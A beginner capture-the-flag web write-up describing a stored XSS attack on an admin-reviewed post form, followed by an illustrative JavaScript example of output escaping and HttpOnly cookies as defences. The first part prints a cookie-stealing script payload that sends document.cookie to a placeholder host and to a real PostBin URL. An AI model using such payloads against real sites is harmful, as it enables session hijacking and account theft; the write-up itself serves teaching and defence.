- TASK : WEB
- TYPE : Beginners
I started with the URL from the description. The link goes to a webpage titled Ministry of Agriculture, with some images and a form that allows us to create a post. When a post is submitted, the webpage responds: Your post was submitted for review. Administator will take a look shortly.
So the admin is alive :)
Checking the admin link, it redirects to home [ location="/" ]
THEN CHECK THE FORM
- I used an XSS trick: it executes an attack to steal cookies from the admin.
<script>
location.href = 'example.com?c00k13='+document.cookie;
</script>
- I used PostBin as the href link
- The final payload then looks like this:
<script>
location.href = 'https://postb.in/1561447806433-7096075240988?c00k13='+document.cookie;
</script>
- After submitting the post
- Then I got a response from the server
- Finally found our FL4G
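
Seen from the application side, the payload above only works if the post body reaches the admin's review page unescaped and the cookie is readable from script. The following is an added example, not the challenge's source code: the function names, the cookie name and the way the page is rendered are all assumptions made for illustration.

```javascript
// Added illustration: hypothetical application code, not the challenge's source.

// Constructed sample: the post body from the write-up, as submitted through the form.
const submittedPost =
  "<script>\nlocation.href = 'example.com?c00k13='+document.cookie;\n</script>";

// Vulnerable pattern (assumed): the post text is concatenated into the review page
// as-is, so the admin's browser parses the <script> element and runs it.
function renderPostUnsafe(body) {
  return '<div class="post">' + body + '</div>';
}

// Encode the HTML-significant characters so the text is displayed, not parsed.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened rendering: the same post now shows up as inert text.
function renderPostSafe(body) {
  return '<div class="post">' + escapeHtml(body) + '</div>';
}

// Second layer: a cookie set with HttpOnly is not exposed through document.cookie,
// so a script that does get injected cannot read it.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Strict`;
}

// Models the browser rule: given Set-Cookie header values, return what
// document.cookie would contain (every cookie without the HttpOnly attribute).
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .filter((h) => !/;\s*httponly\b/i.test(h))
    .map((h) => h.split(';')[0])
    .join('; ');
}

console.log(renderPostSafe(submittedPost));
console.log(JSON.stringify(scriptVisibleCookies([sessionCookieHeader('flag', 'CONSTRUCTED')])));
```

Either control alone would have stopped this particular payload; output encoding removes the script execution, while HttpOnly only protects the cookie.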